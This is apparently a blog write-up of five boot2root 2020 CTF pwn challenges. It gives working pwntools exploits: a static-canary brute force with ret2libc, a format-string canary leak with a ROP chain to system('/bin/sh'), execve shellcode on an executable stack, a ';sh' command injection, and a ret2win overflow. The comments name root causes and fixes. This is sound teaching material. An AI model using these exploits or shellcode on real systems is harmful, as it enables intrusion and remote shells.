
boot2root 2020 pwn writeup

boot2root 2020

Sun, 06 Dec. 2020, 17:30 CST — Mon, 07 Dec. 2020, 17:30 CST

bobby_boi (493pt)

Description

My boi bobby claims to be the new MC, do you have the bars to defeat him in a rap battle? Bobby will need the length of your bars beforehand tho.

nc 35.238.225.156 1002

Author: Viper_S

Attachment

bobby_boi

Analysis

og_bars is used as the static canary in this challenge,

c
/* Global holding the reference value loaded from og_bars.txt. rap_battle()
 * copies it onto the stack and later compares the copy back against this
 * global, so it acts as a hand-rolled (and fixed) stack canary. */
char og_bars[BAR_SIZE];

/*
 * Load the reference "bars" from og_bars.txt into the global og_bars.
 *
 * Because the value comes from a fixed file rather than a per-process random
 * source, it is identical on every run of the server; a canary that never
 * changes gives no protection against guessing. Exits the process when the
 * file cannot be opened.
 */
void read_og_bars(){
    FILE *f = fopen("og_bars.txt", "r");
    if(f == NULL){
        printf("The OG bars are missing, either run the binary on the server or contact admin.\n");
        exit(0);
    }
    /* Return value of fread is not checked: a short file leaves part of
     * og_bars uninitialised. */
    fread(og_bars, sizeof(char), BAR_SIZE, f);
    fclose(f);
}

and "Stack Smashing Detected" is triggered when the stack copy of og_bars (bars) is modified.

c
/* Integrity check on the stack copy. It only detects writes that change
 * `bars`; an overwrite that reproduces og_bars byte-for-byte passes, and the
 * distinct message on failure makes the comparison result observable. */
if(memcmp(bars, og_bars, BAR_SIZE)){
    printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n");
    exit(-1);
}

NOTE: "Stack Smashing Detected" will NOT be triggered if we overwrite the copy with the right og_bars value.

There are two buffer overflows (bof) in this challenge:

c
/*
 * Read a byte count, then the "bars", from stdin and verify the stack copy
 * of og_bars afterwards.
 *
 * The two overflows the writeup refers to are both visible here:
 *  - read(0, buf, count): `count` is parsed from user input with sscanf and is
 *    never bounded by sizeof(buf); the peer chooses how many bytes land on
 *    the stack (a negative int also becomes a very large size_t).
 *  - gets(buf): unbounded read with no safe form; fgets(buf, sizeof buf, stdin)
 *    is the replacement.
 * The memcmp() check afterwards only catches writes that alter `bars`, so a
 * write that reproduces og_bars passes. Mitigations: reject count < 0 and
 * clamp it to sizeof(buf), drop gets(), and rely on the compiler's random
 * per-process canary (-fstack-protector) instead of a fixed file value.
 */
void rap_battle(){
    char bars[BAR_SIZE];
    char buf[MAXLEN];
    char bar_len[MAXLEN];
    int count, x=0;

    /* Stack copy of the reference value; compared back against the global below. */
    memcpy(bars, og_bars, BAR_SIZE);
    puts("Can you defeat bobby in a rap battle?\n");
    printf("What's the size of your bars?\n");
    /* Read the length one byte at a time up to a newline (bounded by MAXLEN). */
    while(x<MAXLEN){
        read(0, bar_len+x, 1);
        if (bar_len[x] == '\n') break;
        x++;
    }
    /* No range check on count; bar_len is not NUL-terminated if it fills up. */
    sscanf(bar_len, "%d", &count);

    puts("Spit your bars here: ");

    /* Overflow 1: length chosen by the peer, not by sizeof(buf). */
    read(0, buf, count);
    /* Overflow 2: gets() has no length limit at all. */
    gets(buf);

    if(memcmp(bars, og_bars, BAR_SIZE)){
        printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n");
        exit(-1);
    }
    fflush(stdout);
}

Solution

We can use read(0, buf, count) to brute-force the static canary byte by byte.

python
#!/usr/bin/python
#coding=utf-8
#__author__:TaQini

from pwn import *
from sys import argv

# Target binary and libc paths; the remote libc defaults to the local one.
local_file = './bobby_boi'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'

# Parse the ELF so symbol and GOT addresses can be looked up later.
elf = ELF(local_file)

# context.log_level = 'debug'
context.arch = elf.arch

def bf(og_bar,c):
    """Test whether og_bar + c is a correct prefix of the server's og_bars.

    Args:
        og_bar: the bytes of og_bars recovered so far (a Python 2 str).
        c: the single candidate character to try next.

    Returns:
        c if the guess passed the server's memcmp check, -1 otherwise.

    Every call opens a fresh connection. The payload is 36 filler bytes followed
    by og_bar + c; its length is sent first so read(0, buf, count) copies exactly
    that many bytes, and the trailing sl('') terminates the gets() call. On a
    wrong guess the target prints its "Stack Smashing Detected" message, so rc()
    returns data and the guess is rejected; on a right guess there is presumably
    no further output, the recv raises, and c is accepted. That observable
    difference is the oracle a fixed, file-loaded canary offers; a per-process
    random canary removes it.
    """
    # Thin wrappers over the tube `p`; it is bound further down in this
    # function and the lambdas look it up at call time.
    se = lambda data :p.send(data)
    sa = lambda delim,data :p.sendafter(delim, data)
    sl = lambda data :p.sendline(data)
    sla = lambda delim,data :p.sendlineafter(delim, data)
    sea = lambda delim,data :p.sendafter(delim, data)
    rc = lambda numb=4096 :p.recv(numb)
    ru = lambda delims, drop=True :p.recvuntil(delims, drop)
    uu32 = lambda data :u32(data.ljust(4, '\0'))
    uu64 = lambda data :u64(data.ljust(8, '\0'))
    info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

    # p = process(local_file)
    p = remote('35.238.225.156',1002)

    # 36 filler bytes, then the known prefix and the candidate byte.
    payload = 'A'*36+og_bar+c
    sla('What\'s the size of your bars?\n',str(len(payload)))
    sea('Spit your bars here: \n',payload)
    sl('')  # newline for gets()
    try:
        data = rc()
        print data
        p.close()
        return -1
    except Exception as e:
        print 'good'
        p.close()
        return c

# Known prefix of og_bars; can be resumed from the command line.
og_bar = ''
if(len(argv)>1):
    og_bar = argv[1]
# Candidate alphabet: printable ASCII plus newline.
table = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\n'
# Extend the prefix one byte at a time; each position costs at most len(table)
# connections, which is why a value that never changes is a weak canary.
while len(og_bar)<=8:
    for c in table:
        res = bf(og_bar,c)
        print 'trying',og_bar+c
        if res != -1:
            og_bar += c
            break
# pause()
print 'og_bar:', og_bar

After we know the canary, we can easily solve it with ret2libc.

python
# Fixed address of main (a constant address implies the binary is not PIE);
# returning here lets the program be driven a second time after the leak.
main = 0x000000000040134B

# leak libc and back to main
# '-V1p3R_$' is the recovered og_bars value, so the memcmp check passes.
payload = 'A'*36+'-V1p3R_$'
sla('What\'s the size of your bars?\n',str(len(payload)))
sea('Spit your bars here: \n',payload)
debug()  # presumably a debugger-attach helper defined elsewhere in the script
payload += cyclic(12)  # filler up to the saved return address
payload += p64(prdi) + p64(elf.got['fopen'])  # rdi = &GOT[fopen]
payload += p64(elf.sym['puts'])               # puts() prints the resolved fopen pointer
payload += p64(main)
sl(payload)  # this longer line goes through gets()

# The leaked pointer has 6 significant bytes; rebase libc from fopen.
# (A non-PIE binary without full RELRO makes the GOT readable at a fixed
# address, which is what makes this single-leak ASLR bypass possible.)
fopen = uu64(rc(6))
libcbase = fopen - libc.sym['fopen']

# one_gadget candidate offsets for the target libc
og = [283174,283258,983908,987655]

# one gadget
payload = 'A'*36+'-V1p3R_$'
sla('What\'s the size of your bars?\n',str(len(payload)))
sea('Spit your bars here: \n',payload)
payload += cyclic(12)
payload += p64(libcbase+og[0])
sl(payload)

flag: b00t2root{y3Ah_Ye4h_b0bbY_b0y_H3_B3_f33l1n_H1m5elf_SG9taWNpZGU=}

More

You can download the full exploit from my GitHub.

canned (491pt)

Description

I think i got my flag stuck in a can, can you open it for me

nc 35.238.225.156 1007

Author: Viper_S

Attachment

canned

Analysis

No PIE; leak libc and the canary, then ret2libc.

Solution

python
prdi = 0x00000000004012bb # pop rdi ; ret

# Format-string read: the input is used directly as a printf format, so
# %15$p / %17$p print the 15th and 17th stack slots — here the canary and a
# libc pointer. Target-side fix: printf("%s", input) / puts(input) and build
# with -Wformat-security.
sla('Say something please\n','%15$p%17$p')
canary = int(rc(len('0xb12bbce59c5ee300')),16)   # len() of a sample gives the expected hex width
libcbase = int(rc(len('0x7f19e320d0b3')),16) - 0x21bf7  # 0x21bf7: offset of the leaked pointer inside libc

sh = libc.search('/bin/sh').next() + libcbase  # Python 2 iterator API (.next())
system = libc.sym['system'] + libcbase

payload = cyclic(24)         # filler up to the canary slot
payload += p64(canary)       # restore the leaked canary so the check passes
payload += p64(0xdeadbeef)   # saved rbp; value irrelevant
payload += p64(prdi+1)       # lone `ret`, presumably for 16-byte stack alignment
payload += p64(prdi) + p64(sh)
payload += p64(system)

sl(payload)

More

You can download the full exploit from my GitHub.

shellCode (477pt) & Shellcode loooong (495pt)

Description

I dont like long long shellcodes keep them short and crispy

nc 35.238.225.156 1008

Author: TheBadGuy

Attachment

shellcode, shellcode

Analysis

No canary, the stack is executable and the buf address is leaked, so we can jump to shellcode placed in buf.

Solution

python
# The program prints the buffer address between "...ed to[" and "]".
# Leaking a stack address and leaving the stack executable (no NX) are the
# two conditions this relies on; either mitigation alone breaks it.
ru('ed to[')
buf = int(ru(']'),16)

# 22-byte x86-64 execve("/bin//sh") shellcode, as given in the writeup
sc = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

offset = 24                  # bytes from buf to the saved return address
payload = 'A'*offset
payload += p64(buf+24+8)     # return into sc, which sits right after the 8-byte return address
payload += sc

sl(payload)

More

You can download the full exploit from my GitHub.

Roppy ropper (467pt)

Description

I love ropes do you?

nc 35.238.225.156 1004

Author: TheBadGuy

Attachment

lsass

Analysis

statically linked:

bash
% ldd lsass 
not a dynamic executable

run_command:

c
/*
 * Decompiler output: formats "ls <a1>" into a 7-byte stack buffer and hands
 * the string to system().
 *
 * Root cause: user input is spliced into a shell command line, so shell
 * metacharacters in a1 are interpreted by /bin/sh — command injection. The
 * snprintf size limit truncates the string but does not neutralise
 * metacharacters. Fix: do not route input through system(); exec /bin/ls via
 * execve()/posix_spawn() with the argument as a separate argv element, and
 * validate it against an allow-list first.
 * NOTE(review): `char a1` is used with %s, so the real parameter is presumably
 * a pointer; confirm against the disassembly.
 */
int __cdecl run_command(char a1){
    char v2; // [esp+6h] [ebp-12h]
    snprintf(&v2, 7, "ls %s", a1);
    printf("Result: %s:\n", (unsigned int)&v2);
    return system(&v2);
}

We can append sh after ls with ; to get a shell.

payload: ls ;sh

Solution

bash
% nc 35.238.225.156 1004 
(list_me_like_crazy)
Is this lsass I dont understand :)
Give me your arguments:
;sh
Result: ls ;sh:
flag.txt
lsass
cat flag.txt
b00t2root{R0p_cHa1nS_ar3_tH3_b3st}

flag: b00t2root{R0p_cHa1nS_ar3_tH3_b3st}

More

You can download the full exploit from my GitHub.

Welcome To Pwn (457pt)

Description

Welcome to pwn, here is an easy challenge to get you started.

nc 35.238.225.156 1001

Author: Viper_S

Attachment

welcome

Analysis

ret2win

Solution

python
# ret2win: overwrite the saved return address with the address of the target
# function. A fixed address works because the binary is not PIE; PIE plus a
# stack canary would require a leak first.
offset = 152                 # distance from the input buffer to the saved return address
payload = 'A'*offset
payload += p64(0x00401186)   # fixed address of the win function
sl(payload)
p.interactive()

More

You can download the full exploit from my GitHub.

文章作者: TaQini
文章链接: http://taqini.space/2020/12/07/boot2root2020-pwn-writeup/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 TaQini